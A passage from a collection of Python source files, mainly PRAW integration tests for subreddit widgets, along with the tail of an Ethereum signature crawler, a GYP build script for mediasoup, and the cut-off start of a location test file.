db_session.bulk_save_objects(rows)\n db_session.commit()\n\n return page.get(\"next\")\n\n\ndef crawl(crawl_type: str, interval: float) -> None:\n crawl_url: Optional[str] = CRAWL_URLS[crawl_type]\n db_model = DB_MODELS[crawl_type]\n with yield_db_session_ctx() as db_session:\n while crawl_url is not None:\n print(f\"Crawling: {crawl_url}\")\n crawl_url = crawl_step(db_session, crawl_url, db_model)\n time.sleep(interval)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Crawls function and event signatures from the Ethereum Signature Database (https://www.4byte.directory/)\"\n )\n parser.add_argument(\n \"crawl_type\",\n choices=CRAWL_URLS,\n help=\"Specifies whether to crawl function signatures or event signatures\",\n )\n parser.add_argument(\n \"--interval\",\n type=float,\n default=0.1,\n help=\"Number of seconds to wait between requests to the Ethereum Signature Database API\",\n )\n args = parser.parse_args()\n\n crawl(args.crawl_type, args.interval)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a2fffabca09fbc25104a88cc8bdbb8d1b43aded", "content": "import mock\nimport pytest\nfrom os.path import abspath, dirname, join\nimport sys\n\nfrom praw.models import (Button, ButtonWidget, Calendar, CommunityList,\n CustomWidget, Menu, MenuLink, 
IDCard, Image,\n ImageData, ImageWidget, ModeratorsWidget,\n PostFlairWidget, Redditor, RulesWidget, Submenu,\n Subreddit, TextArea, Widget)\nfrom ... import IntegrationTest\n\nif sys.version_info.major > 2:\n basestring = str # pylint: disable=invalid-name\n\n\nclass TestButtonWidget(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n def test_button_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n button_widget = None\n for widget in widgets.sidebar:\n if isinstance(widget, ButtonWidget):\n button_widget = widget\n break\n assert isinstance(button_widget, ButtonWidget)\n assert len(button_widget) >= 1\n assert all(isinstance(button, Button) for button in\n button_widget.buttons)\n assert button_widget == button_widget\n assert button_widget.id == button_widget\n assert button_widget in widgets.sidebar\n\n assert button_widget[0].text\n assert button_widget.shortName\n assert hasattr(button_widget, 'description')\n\n assert subreddit == button_widget.subreddit\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestButtonWidget.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n my_image = widgets.mod.upload_image(self.image_path('test.png'))\n buttons = [\n {\n 'kind': 'text',\n 'text': 'View source',\n 'url': 'https://github.com/praw-dev/praw',\n 'color': '#FF0000',\n 'textColor': '#00FF00',\n 'fillColor': '#0000FF',\n 'hoverState': {\n 'kind': 'text',\n 'text': 'VIEW SOURCE!',\n 'color': '#FFFFFF',\n 'textColor': '#000000',\n 'fillColor': '#0000FF'\n }\n },\n {\n 'kind': 'image',\n 'text': 'View documentation',\n 'linkUrl': 'https://praw.readthedocs.io',\n 'url': my_image,\n 'height': 200,\n 'width': 200,\n 'hoverState': {\n 'kind': 'image',\n 'url': my_image,\n 'height': 200,\n 'width': 200\n }\n },\n {\n 'kind': 'text',\n 'text': '/r/redditdev',\n 'url': 'https://reddit.com/r/redditdev',\n 'color': '#000000',\n 'textColor': '#FF00FF',\n 'fillColor': '#005500'\n }\n ]\n widget = widgets.mod.add_button_widget(\n 'Things to click', 'Click some of these *cool* links!',\n buttons, styles)\n\n assert isinstance(widget, ButtonWidget)\n assert len(widget) == 3\n assert all(isinstance(item, Button) for item in widget)\n assert widget.shortName == 'Things to click'\n assert widget.description == 'Click some of these *cool* links!'\n assert widget.styles == styles\n\n assert widget[0].text == 'View source'\n assert widget[0].url == 'https://github.com/praw-dev/praw'\n assert widget[2].text == '/r/redditdev'\n assert widget[2].url == 'https://reddit.com/r/redditdev'\n\n assert widget[1].text == 'View documentation'\n assert widget[1].linkUrl == 'https://praw.readthedocs.io'\n assert widget[1].hoverState['kind'] == 'image'\n assert widget[1].hoverState['height'] == 200\n\n widgets.refresh() # the links are initially invalid\n for new_widget in widgets.sidebar:\n if new_widget == widget:\n widget = new_widget\n break\n\n widget = widget.mod.update(shortName='New short name')\n\n assert isinstance(widget, ButtonWidget)\n assert len(widget) == 3\n assert 
all(isinstance(item, Button) for item in widget)\n assert widget.shortName == 'New short name'\n assert widget.description == 'Click some of these *cool* links!'\n assert widget.styles == styles\n\n assert widget[0].text == 'View source'\n assert widget[0].url == 'https://github.com/praw-dev/praw'\n assert widget[2].text == '/r/redditdev'\n assert widget[2].url == 'https://reddit.com/r/redditdev'\n\n assert widget[1].text == 'View documentation'\n assert widget[1].linkUrl == 'https://praw.readthedocs.io'\n assert widget[1].hoverState['kind'] == 'image'\n assert widget[1].hoverState['height'] == 200\n\n buttons.reverse()\n widget = widget.mod.update(buttons=buttons)\n\n assert isinstance(widget, ButtonWidget)\n assert len(widget) == 3\n assert all(isinstance(item, Button) for item in widget)\n assert widget.shortName == 'New short name'\n assert widget.description == 'Click some of these *cool* links!'\n assert widget.styles == styles\n\n assert widget[0].text == '/r/redditdev'\n assert widget[0].url == 'https://reddit.com/r/redditdev'\n assert widget[2].text == 'View source'\n assert widget[2].url == 'https://github.com/praw-dev/praw'\n\n assert widget[1].text == 'View documentation'\n assert widget[1].linkUrl == 'https://praw.readthedocs.io'\n assert widget[1].hoverState['kind'] == 'image'\n assert widget[1].hoverState['height'] == 200\n\n widget.mod.delete()\n\n\nclass TestCalendar(IntegrationTest):\n\n def test_calendar(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n calendar = None\n for widget in widgets.sidebar:\n if isinstance(widget, Calendar):\n calendar = widget\n break\n assert isinstance(calendar, Calendar)\n assert calendar == calendar\n assert calendar.id == calendar\n assert calendar in widgets.sidebar\n\n assert isinstance(calendar.configuration, dict)\n assert hasattr(calendar, 'requiresSync')\n\n assert subreddit == calendar.subreddit\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestCalendar.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n config = {'numEvents': 10,\n 'showDate': True,\n 'showDescription': False,\n 'showLocation': False,\n 'showTime': True,\n 'showTitle': True}\n cal_id = 'ccahu0rstno2jrvioq4ccffn78@group.calendar.google.com'\n widget = widgets.mod.add_calendar('Upcoming Events', cal_id, True,\n config, styles)\n\n assert isinstance(widget, Calendar)\n assert widget.shortName == 'Upcoming Events'\n assert widget.googleCalendarId == 'ccahu0rstno2jrvioq4ccffn78@' \\\n 'group.calendar.google.com'\n assert widget.configuration == config\n assert widget.styles == styles\n\n widget = widget.mod.update(shortName='Past Events :(')\n\n assert isinstance(widget, Calendar)\n assert widget.shortName == 'Past Events :('\n assert widget.googleCalendarId == 'ccahu0rstno2jrvioq4ccffn78@' \\\n 'group.calendar.google.com'\n assert widget.configuration == config\n assert widget.styles == styles\n\n widget.mod.delete()\n\n\nclass TestCommunityList(IntegrationTest):\n\n def test_community_list(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with 
self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n comm_list = None\n for widget in widgets.sidebar:\n if isinstance(widget, CommunityList):\n comm_list = widget\n break\n assert isinstance(comm_list, CommunityList)\n assert len(comm_list) >= 1\n assert all(isinstance(subreddit, Subreddit) for subreddit in\n comm_list)\n assert comm_list == comm_list\n assert comm_list.id == comm_list\n assert comm_list in widgets.sidebar\n\n assert comm_list.shortName\n assert comm_list[0] in comm_list\n\n assert subreddit == comm_list.subreddit\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestCommunityList.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n subreddits = ['learnpython', self.reddit.subreddit('redditdev')]\n widget = widgets.mod.add_community_list('My fav subs', subreddits,\n styles)\n\n assert isinstance(widget, CommunityList)\n assert widget.shortName == 'My fav subs'\n assert widget.styles == styles\n assert self.reddit.subreddit('learnpython') in widget\n assert 'redditdev' in widget\n\n widget = widget.mod.update(shortName='My least fav subs :(',\n data=['redesign'])\n\n assert isinstance(widget, CommunityList)\n assert widget.shortName == 'My least fav subs :('\n assert widget.styles == styles\n assert self.reddit.subreddit('redesign') in widget\n\n widget.mod.delete()\n\n\nclass TestCustomWidget(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestCustomWidget.test_create_and_update_and_delete'):\n image_dicts = [{'width': 0,\n 'height': 0,\n 'name': 'a',\n 'url': widgets.mod.upload_image(self.image_path(\n 'test.png'))}]\n\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_custom_widget('My widget',\n '# Hello world!', '/**/',\n 200, image_dicts, styles)\n\n assert isinstance(widget, CustomWidget)\n assert widget.shortName == 'My widget'\n assert widget.text == '# Hello world!'\n assert widget.css == '/**/'\n assert widget.height == 200\n assert widget.styles == styles\n assert len(widget.imageData) == 1\n assert all(isinstance(img, ImageData) for img in widget.imageData)\n\n # initially, image URLs are incorrect, so we much refresh to get\n # the proper ones.\n widgets.refresh()\n refreshed = widgets.sidebar[-1]\n assert refreshed == widget\n widget = refreshed\n\n new_css = 'h1,h2,h3,h4,h5,h6 {color: #00ff00;}'\n widget = widget.mod.update(css=new_css)\n\n assert isinstance(widget, CustomWidget)\n assert widget.shortName == 'My widget'\n assert widget.text == '# Hello world!'\n assert widget.css == new_css\n assert widget.height == 200\n assert widget.styles == styles\n assert len(widget.imageData) == 1\n assert all(isinstance(img, ImageData) for img in widget.imageData)\n\n widget.mod.delete()\n\n def test_custom_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with 
self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n custom = None\n for widget in widgets.sidebar:\n if isinstance(widget, CustomWidget):\n custom = widget\n break\n assert isinstance(custom, CustomWidget)\n assert len(custom.imageData) > 0\n assert all(isinstance(img_data, ImageData) for img_data in\n custom.imageData)\n assert custom == custom\n assert custom.id == custom\n assert custom in widgets.sidebar\n\n assert 500 >= custom.height >= 50\n assert custom.text\n assert custom.css\n assert custom.shortName\n\n assert subreddit == custom.subreddit\n\n\nclass TestIDCard(IntegrationTest):\n\n def test_id_card(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n card = widgets.id_card\n assert isinstance(card, IDCard)\n assert card == card\n assert card.id == card\n\n assert card.shortName\n assert card.currentlyViewingText\n assert card.subscribersText\n\n assert subreddit == card.subreddit\n\n\nclass TestImageWidget(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestImageWidget.test_create_and_update_and_delete'):\n image_paths = (self.image_path(name) for name in\n ('test.jpg', 'test.png'))\n image_dicts = [{'width': 0, 'height': 0, 'linkUrl': '',\n 'url': widgets.mod.upload_image(img_path)}\n for img_path in image_paths]\n\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_image_widget(short_name='My new pics!',\n data=image_dicts,\n styles=styles)\n\n assert isinstance(widget, ImageWidget)\n assert widget.shortName == 'My new pics!'\n assert widget.styles == styles\n assert len(widget) == 2\n assert all(isinstance(img, Image) for img in widget)\n\n widget = widget.mod.update(shortName='My old pics :(',\n data=image_dicts[:1])\n\n assert isinstance(widget, ImageWidget)\n assert widget.shortName == 'My old pics :('\n assert widget.styles == styles\n assert len(widget) == 1\n assert all(isinstance(img, Image) for img in widget)\n\n widget.mod.delete()\n\n def test_image_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n img_widget = None\n for widget in widgets.sidebar:\n if isinstance(widget, ImageWidget):\n img_widget = widget\n break\n assert isinstance(img_widget, ImageWidget)\n assert len(img_widget) >= 1\n assert all(isinstance(image, Image) for image in img_widget)\n assert img_widget == img_widget\n assert img_widget.id == img_widget\n assert img_widget in widgets.sidebar\n\n assert img_widget[0].linkUrl\n assert img_widget.shortName\n\n assert subreddit == img_widget.subreddit\n\n\nclass TestMenu(IntegrationTest):\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n menu_contents = [\n {'text': 'My homepage', 'url': 'https://example.com'},\n {'text': 'Python packages',\n 
'children': [\n {'text': 'PRAW', 'url': 'https://praw.readthedocs.io/'},\n {'text': 'requests', 'url': 'http://python-requests.org'}\n ]},\n {'text': 'Reddit homepage', 'url': 'https://reddit.com'}\n ]\n\n with self.recorder.use_cassette(\n 'TestMenu.test_create_and_update_and_delete'):\n widget = widgets.mod.add_menu(menu_contents)\n\n assert isinstance(widget, Menu)\n assert len(widget) == 3\n assert all(isinstance(item, (Submenu, MenuLink))\n for item in widget)\n assert all(all(isinstance(item, MenuLink) for item in subm)\n for subm in widget if isinstance(subm, Submenu))\n\n assert widget[0].text == 'My homepage'\n assert widget[0].url == 'https://example.com'\n assert widget[2].text == 'Reddit homepage'\n assert widget[2].url == 'https://reddit.com'\n\n assert widget[1].text == 'Python packages'\n assert widget[1][0].text == 'PRAW'\n assert widget[1][0].url == 'https://praw.readthedocs.io/'\n assert widget[1][1].text == 'requests'\n assert widget[1][1].url == 'http://python-requests.org'\n\n menu_contents.reverse()\n widget = widget.mod.update(data=menu_contents)\n\n assert isinstance(widget, Menu)\n assert len(widget) == 3\n assert all(isinstance(item, (Submenu, MenuLink))\n for item in widget)\n assert all(all(isinstance(item, MenuLink) for item in subm)\n for subm in widget if isinstance(subm, Submenu))\n\n assert widget[0].text == 'Reddit homepage'\n assert widget[0].url == 'https://reddit.com'\n assert widget[2].text == 'My homepage'\n assert widget[2].url == 'https://example.com'\n\n assert widget[1].text == 'Python packages'\n assert widget[1][0].text == 'PRAW'\n assert widget[1][0].url == 'https://praw.readthedocs.io/'\n assert widget[1][1].text == 'requests'\n assert widget[1][1].url == 'http://python-requests.org'\n\n widget.mod.delete()\n\n def test_menu(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n menu = None\n for widget in widgets.topbar:\n if isinstance(widget, Menu):\n menu = widget\n break\n assert isinstance(menu, Menu)\n assert all(isinstance(item, (MenuLink, Submenu)) for item in menu)\n assert menu == menu\n assert menu.id == menu\n assert menu in widgets.topbar\n assert len(menu) >= 1\n assert menu[0].text\n\n assert subreddit == menu.subreddit\n\n submenu = None\n for child in menu:\n if isinstance(child, Submenu):\n submenu = child\n break\n assert isinstance(submenu, Submenu)\n assert len(submenu) >= 0\n assert all(isinstance(child, MenuLink) for child in submenu)\n assert submenu[0].text\n assert submenu[0].url\n\n\nclass TestModeratorsWidget(IntegrationTest):\n\n def test_moderators_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n mods = widgets.moderators_widget\n assert isinstance(mods, ModeratorsWidget)\n assert all(isinstance(mod, Redditor) for mod in mods)\n assert mods == mods\n assert mods.id == mods\n\n assert len(mods) >= 1\n assert isinstance(mods[0], Redditor)\n\n assert subreddit == mods.subreddit\n\n\nclass TestPostFlairWidget(IntegrationTest):\n\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 
'TestPostFlairWidget.test_create_and_update_and_delete'):\n flairs = [f['id'] for f in subreddit.flair.link_templates]\n\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_post_flair_widget('Some flairs', 'list',\n flairs, styles)\n\n assert isinstance(widget, PostFlairWidget)\n assert widget.shortName == 'Some flairs'\n assert widget.display == 'list'\n assert widget.order == flairs\n assert widget.styles == styles\n assert len(widget) == 2\n assert all(flair_id in widget.templates for flair_id in widget)\n\n widget = widget.mod.update(display='cloud')\n\n assert isinstance(widget, PostFlairWidget)\n assert widget.shortName == 'Some flairs'\n assert widget.display == 'cloud'\n assert widget.order == flairs\n assert widget.styles == styles\n assert len(widget) == 2\n assert all(flair_id in widget.templates for flair_id in widget)\n\n widget = widget.mod.update(order=widget.order[1:])\n\n assert isinstance(widget, PostFlairWidget)\n assert widget.shortName == 'Some flairs'\n assert widget.display == 'cloud'\n assert widget.order == flairs[1:]\n assert widget.styles == styles\n assert len(widget) == 1\n assert all(flair_id in widget.templates for flair_id in widget)\n\n widget.mod.delete()\n\n def test_post_flair_widget(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n pf_widget = None\n for widget in widgets.sidebar:\n if isinstance(widget, PostFlairWidget):\n pf_widget = widget\n break\n assert isinstance(pf_widget, PostFlairWidget)\n assert len(pf_widget) >= 1\n assert all(flair_id in widget.templates for flair_id in widget)\n assert pf_widget == pf_widget\n assert pf_widget.id == pf_widget\n assert pf_widget in widgets.sidebar\n\n assert pf_widget.shortName\n assert all(flair in pf_widget for flair in pf_widget)\n\n assert subreddit == pf_widget.subreddit\n\n\nclass TestRulesWidget(IntegrationTest):\n\n def test_rules_widget(self):\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n rules = None\n for widget in widgets.sidebar:\n if isinstance(widget, RulesWidget):\n rules = widget\n break\n assert isinstance(rules, RulesWidget)\n assert rules == rules\n assert rules.id == rules\n\n assert rules.display\n\n assert len(rules) > 0\n assert subreddit == rules.subreddit\n\n\nclass TestSubredditWidgets(IntegrationTest):\n def test_bad_attribute(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n with pytest.raises(AttributeError):\n widgets.nonexistant_attribute\n\n def test_items(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert isinstance(widgets.items, dict)\n\n def test_progressive_images(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n def has_progressive(widgets_):\n # best way I could figure if an image is progressive\n sign = 'fm=pjpg'\n\n for widget in widgets_.sidebar:\n if isinstance(widget, ImageWidget):\n for image in widget:\n if sign in image.url:\n return True\n elif isinstance(widget, CustomWidget):\n for image_data in widget.imageData:\n if sign 
in image_data.url:\n return True\n\n return False\n\n with self.recorder.use_cassette(\n 'TestSubredditWidgets.test_progressive_images'):\n widgets.progressive_images = True\n assert has_progressive(widgets)\n widgets.progressive_images = False\n widgets.refresh()\n assert not has_progressive(widgets)\n widgets.progressive_images = True\n widgets.refresh()\n assert has_progressive(widgets)\n\n def test_refresh(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.test_refresh'):\n assert widgets.sidebar # to fetch\n old_sidebar = widgets.sidebar # reference, not value\n widgets.refresh()\n assert old_sidebar is not widgets.sidebar # should be new list\n\n def test_repr(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n assert (\"SubredditWidgets(subreddit=Subreddit(display_name='\"\n \"{}'))\").format(pytest.placeholders.test_subreddit) == repr(\n widgets)\n\n def test_sidebar(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert len(widgets.sidebar) >= 1 # also tests lazy-loading\n\n # all items should be Widget subclasses\n assert all(isinstance(widget, Widget) and type(widget) != Widget\n for widget in widgets.sidebar)\n\n def test_specials(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert isinstance(widgets.id_card, IDCard)\n assert isinstance(widgets.moderators_widget, ModeratorsWidget)\n\n def test_topbar(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert 1 <= len(widgets.topbar)\n assert all(isinstance(widget, Widget) and type(widget) != Widget\n for widget in widgets.topbar)\n\n\nclass TestSubredditWidgetsModeration(IntegrationTest):\n @staticmethod\n def image_path(name):\n test_dir = abspath(dirname(sys.modules[__name__].__file__))\n return join(test_dir, '..', '..', 'files', name)\n\n @mock.patch('time.sleep', return_value=None)\n def test_reorder(self, _):\n self.reddit.read_only = False\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestSubredditWidgetsModeration.test_reorder'):\n old_order = list(widgets.sidebar)\n new_order = list(reversed(old_order))\n\n widgets.mod.reorder(new_order)\n widgets.refresh()\n assert list(widgets.sidebar) == new_order\n\n widgets.mod.reorder(old_order)\n widgets.refresh()\n assert list(widgets.sidebar) == old_order\n\n mixed_types = [thing if i % 2 == 0 else thing.id\n for i, thing in enumerate(new_order)]\n # mixed_types has some str and some Widget.\n assert any(isinstance(thing, basestring) for thing in mixed_types)\n assert any(isinstance(thing, Widget) for thing in mixed_types)\n\n widgets.mod.reorder(mixed_types)\n widgets.refresh()\n assert list(widgets.sidebar) == new_order\n\n @mock.patch('time.sleep', return_value=None)\n def test_upload_image(self, _):\n self.reddit.read_only = False\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 
'TestSubredditWidgetsModeration.test_upload_image'):\n for image in ('test.jpg', 'test.png'):\n image_url = widgets.mod.upload_image(self.image_path(image))\n assert image_url\n\n\nclass TestTextArea(IntegrationTest):\n @mock.patch('time.sleep', return_value=None)\n def test_create_and_update_and_delete(self, _):\n self.reddit.read_only = False\n\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n\n with self.recorder.use_cassette(\n 'TestTextArea.test_create_and_update_and_delete'):\n styles = {'headerColor': '#123456', 'backgroundColor': '#bb0e00'}\n widget = widgets.mod.add_text_area(short_name='My new widget!',\n text='Hello world!',\n styles=styles)\n\n assert isinstance(widget, TextArea)\n assert widget.shortName == 'My new widget!'\n assert widget.styles == styles\n assert widget.text == 'Hello world!'\n\n widget = widget.mod.update(shortName='My old widget :(',\n text='Feed me')\n\n assert isinstance(widget, TextArea)\n assert widget.shortName == 'My old widget :('\n assert widget.styles == styles\n assert widget.text == 'Feed me'\n\n widget.mod.delete()\n\n def test_text_area(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n text = None\n for widget in widgets.sidebar:\n if isinstance(widget, TextArea):\n text = widget\n break\n assert isinstance(text, TextArea)\n assert text == text\n assert text.id == text\n assert text in widgets.sidebar\n assert text in widgets.sidebar\n\n assert text.shortName\n assert text.text\n\n assert subreddit == text.subreddit\n\n\nclass TestWidget(IntegrationTest):\n def test_inequality(self):\n subreddit = self.reddit.subreddit(pytest.placeholders.test_subreddit)\n widgets = subreddit.widgets\n with self.recorder.use_cassette('TestSubredditWidgets.fetch_widgets'):\n assert len(widgets.sidebar) >= 2\n assert widgets.sidebar[0] != widgets.sidebar[1]\n assert widgets.sidebar[0] != widgets.sidebar[1].id\n assert u'\\xf0\\x9f\\x98\\x80' != widgets.sidebar[0] # for python 2\n"} {"ext": "py", "sha": "1a300032205a6b71ba08b5e7d24efeaa39f773c6", "content": "#!/usr/bin/env python\n\n#\n# Script inspired in bud:\n# https://github.com/indutny/bud\n#\n\nimport platform\nimport os\nimport subprocess\nimport sys\n\nCC = os.environ.get('CC', 'cc')\nscript_dir = os.path.dirname(__file__)\nroot = os.path.normpath(os.path.join(script_dir, '..'))\noutput_dir = os.path.join(os.path.abspath(root), 'out')\n\nsys.path.insert(0, os.path.join(root, 'deps', 'gyp', 'pylib'))\ntry:\n import gyp\nexcept ImportError:\n print('Error: you need to install gyp in deps/gyp first, run:')\n print(' ./scripts/get-dep.sh gyp')\n sys.exit(42)\n\ndef host_arch():\n machine = platform.machine()\n if machine == 'i386': return 'ia32'\n if machine == 'x86_64': return 'x64'\n if machine == 'aarch64': return 'arm64'\n if machine == 'mips64': return 'mips64el'\n if machine.startswith('arm'): return 'arm'\n if machine.startswith('mips'): return 'mips'\n return machine # Return as-is and hope for the best.\n\ndef compiler_version():\n proc = subprocess.Popen(CC.split() + ['--version'], stdout=subprocess.PIPE)\n is_clang = b'clang' in proc.communicate()[0].split(b'\\n')[0]\n proc = subprocess.Popen(CC.split() + ['-dumpversion'], stdout=subprocess.PIPE)\n version = proc.communicate()[0].split(b'.')\n mayor_version = int(version[:1][0])\n if is_clang is False and mayor_version >= 7:\n proc = subprocess.Popen(CC.split() + 
['-dumpfullversion'], stdout=subprocess.PIPE)\n version = proc.communicate()[0].split(b'.')\n version = map(int, version[:2])\n version = tuple(version)\n return (version, is_clang)\n\ndef run_gyp(args):\n rc = gyp.main(args)\n if rc != 0:\n print('Error running GYP')\n sys.exit(rc)\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n\n # GYP bug.\n # On msvs it will crash if it gets an absolute path.\n # On Mac/make it will crash if it doesn't get an absolute path.\n # NOTE ibc: Not sure that it requires absolute path in Mac/make...\n if sys.platform == 'win32':\n args.append(os.path.join(root, 'mediasoup-worker.gyp'))\n common_fn = os.path.join(root, 'common.gypi')\n # we force vs 2010 over 2008 which would otherwise be the default for gyp.\n if not os.environ.get('GYP_MSVS_VERSION'):\n os.environ['GYP_MSVS_VERSION'] = '2010'\n else:\n args.append(os.path.join(os.path.abspath(root), 'mediasoup-worker.gyp'))\n common_fn = os.path.join(os.path.abspath(root), 'common.gypi')\n\n if os.path.exists(common_fn):\n args.extend(['-I', common_fn])\n\n args.append('--depth=' + root)\n\n # There's a bug with windows which doesn't allow this feature.\n if sys.platform != 'win32':\n if '-f' not in args:\n args.extend('-f make'.split())\n if 'ninja' not in args:\n args.extend(['-Goutput_dir=' + output_dir])\n args.extend(['--generator-output', output_dir])\n (major, minor), is_clang = compiler_version()\n args.append('-Dgcc_version=%d' % (10 * major + minor))\n args.append('-Dclang=%d' % int(is_clang))\n if is_clang is False and major == 4 and minor <= 8:\n raise RuntimeError('gcc <= 4.8 not supported, please upgrade your gcc')\n\n if not any(a.startswith('-Dhost_arch=') for a in args):\n args.append('-Dhost_arch=%s' % host_arch())\n\n if not any(a.startswith('-Dtarget_arch=') for a in args):\n args.append('-Dtarget_arch=%s' % host_arch())\n\n if any(a.startswith('-Dopenssl_fips=') for a in args):\n fips_fn = os.path.join(os.path.abspath(root), 'fips.gypi')\n args.extend(['-I', fips_fn])\n else:\n args.append('-Dopenssl_fips=')\n\n if 'asan' in args:\n args.append('-Dmediasoup_asan=true')\n args = filter(lambda arg: arg != 'asan', args)\n else:\n args.append('-Dmediasoup_asan=false')\n\n args.append('-Dnode_byteorder=' + sys.byteorder)\n\n gyp_args = list(args)\n print(gyp_args)\n run_gyp(gyp_args)\n"} {"ext": "py", "sha": "1a3000de496c901bc6d511dd1d5046206e8ac2fa", "content": "'''\nCreated on 2020-08-11\n\n@author: wf\n'''\nimport unittest\nimport time\nfrom lodstorage.sparql import SPARQL\nfrom lodstorage.lod import LOD\nfrom ptp.location import CountryManager, ProvinceManager, CityManager\nimport datetime\nfrom collections import Counter\nimport getpass\n\nclass TestLocations(unittest.TestCase):\n '''\n check countries, provinces/states and cities\n '''\n def setUp(self):\n self.debug=False\n pass\n\n\n def tearDown(self):\n pass\n\n def testCityStorage(self):\n '''\n try storing city data 